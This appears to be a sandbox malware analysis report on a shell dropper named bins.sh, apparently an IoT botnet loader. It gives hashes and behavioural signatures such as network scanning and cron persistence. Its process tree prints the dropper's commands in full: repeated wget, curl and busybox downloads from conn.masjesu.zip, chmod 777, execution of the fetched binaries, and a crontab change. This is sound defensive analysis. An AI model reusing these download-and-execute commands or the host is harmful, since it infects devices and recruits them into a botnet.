Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    04-11-2024 10:45

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    facd8d5b4de07f8d4d3e00bf507864de

  • SHA1

    6b61bfefc5c5b94bbb154d7bfa00d46c67c421a5

  • SHA256

    00f8a20ed14d818a6397e452410bbc7ad21628aa1aad3b52031fab9dfcd648ad

  • SHA512

    9c32e3e7c4e80b00a5a7cf8ab8d5d4539c19359d0bc62d259b149551d6ef3051a352dde1a701dca898959b6f6d5c1434583f2f992a01caf02fece8a36d5bd721

  • SSDEEP

    192:yjojaqBgs6UM43mu0Ay85dgTjF7S7i7DU7wvKhdKHH+5dgTj57S7i7DU7wmhdKHw:yjojaqBgsuAy85dgTjFGuUqC5dgTj5GL

Malware Config

Signatures

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Contacts a large (1893) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 19 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 10 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:685
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:689
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:693
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:709
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:716
        • /bin/chmod
          chmod 777 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • File and Directory Permissions Modification
          PID:717
        • /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          ./cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • Executes dropped EXE
          • System Network Configuration Discovery
          PID:718
        • /bin/rm
          rm cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • System Network Configuration Discovery
          PID:720
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:721
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:722
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:724
        • /bin/chmod
          chmod 777 46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          2⤵
          • File and Directory Permissions Modification
          PID:725
        • /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          ./46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          2⤵
          • Executes dropped EXE
          PID:726
        • /bin/rm
          rm 46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          2⤵
            PID:728
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:729
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:730
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:745
          • /bin/chmod
            chmod 777 ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM
            2⤵
            • File and Directory Permissions Modification
            PID:750
          • /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM
            ./ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM
            2⤵
            • Executes dropped EXE
            • Renames itself
            • Reads runtime system information
            PID:752
            • /bin/sh
              sh -c "crontab -l"
              3⤵
                PID:754
                • /usr/bin/crontab
                  crontab -l
                  4⤵
                    PID:755
                • /bin/sh
                  sh -c "crontab -"
                  3⤵
                    PID:758
                    • /usr/bin/crontab
                      crontab -
                      4⤵
                      • Creates/modifies Cron job
                      • Reads runtime system information
                      PID:759
                • /bin/rm
                  rm ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM
                  2⤵
                    PID:766
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk
                    2⤵
                    • System Network Configuration Discovery
                    PID:770
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk
                    2⤵
                    • System Network Configuration Discovery
                    PID:772
                  • /bin/busybox
                    /bin/busybox wget http://conn.masjesu.zip/bins/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk
                    2⤵
                    • System Network Configuration Discovery
                    PID:854
                  • /bin/chmod
                    chmod 777 YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk
                    2⤵
                    • File and Directory Permissions Modification
                    PID:867
                  • /tmp/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk
                    ./YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk
                    2⤵
                      PID:868
                    • /bin/rm
                      rm YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk
                      2⤵
                        PID:871
                      • /usr/bin/wget
                        wget http://conn.masjesu.zip/bins/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj
                        2⤵
                        • System Network Configuration Discovery
                        PID:875
                      • /usr/bin/curl
                        curl -O http://conn.masjesu.zip/bins/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj
                        2⤵
                        • System Network Configuration Discovery
                        PID:879
                      • /bin/busybox
                        /bin/busybox wget http://conn.masjesu.zip/bins/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj
                        2⤵
                        • System Network Configuration Discovery
                        • Writes file to tmp directory
                        PID:882
                      • /bin/chmod
                        chmod 777 n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj
                        2⤵
                        • File and Directory Permissions Modification
                        PID:886
                      • /tmp/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj
                        ./n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj
                        2⤵
                        • Executes dropped EXE
                        PID:887
                      • /bin/rm
                        rm n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj
                        2⤵
                          PID:889
                        • /usr/bin/wget
                          wget http://conn.masjesu.zip/bins/QcdrIEZDXYUM9RbUiOWvmWrbMxHb7Wcj6i
                          2⤵
                          • System Network Configuration Discovery
                          PID:894
                        • /usr/bin/curl
                          curl -O http://conn.masjesu.zip/bins/QcdrIEZDXYUM9RbUiOWvmWrbMxHb7Wcj6i
                          2⤵
                          • System Network Configuration Discovery
                          PID:899

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d

                        Filesize

                        127KB

                        MD5

                        89077b7bd4bcafca7713be43635c4862

                        SHA1

                        fc02edb8fba29ea8ee99e6157ef8560334530052

                        SHA256

                        78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

                        SHA512

                        1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

                      • /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj

                        Filesize

                        98KB

                        MD5

                        5141342d0df8699fa32a6b066a0c592e

                        SHA1

                        8157673225bd5182f16215e2aa823a25ca2d4fbc

                        SHA256

                        54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

                        SHA512

                        d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

                      • /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM

                        Filesize

                        151KB

                        MD5

                        6c583043d91c55aa470c08c87058e917

                        SHA1

                        abf65a5b9bba69980278ad09356e53de8bb89439

                        SHA256

                        2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                        SHA512

                        82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                      • /tmp/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj

                        Filesize

                        111KB

                        MD5

                        ca897a38f23ec23521ce0b1b83f8422d

                        SHA1

                        b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

                        SHA256

                        043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

                        SHA512

                        10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

                      • /var/spool/cron/crontabs/tmp.vBHty3

                        Filesize

                        210B

                        MD5

                        869e0da355a4faabd8aa2d661459b7e1

                        SHA1

                        5d817d53c410b8f45d4cce5cdf7b228df7ff97a1

                        SHA256

                        60a6877783cee1b04d48bc18da841c991b136e2b21b22ca78e768f1fc2abe818

                        SHA512

                        31f64160224867c7ab6449ad31d78296c300561a545bb5d26d048d047b594e1eee8e52c70744db2fc6d07d0479346e5cd3198c732bf8b1732a5320895a1e6af6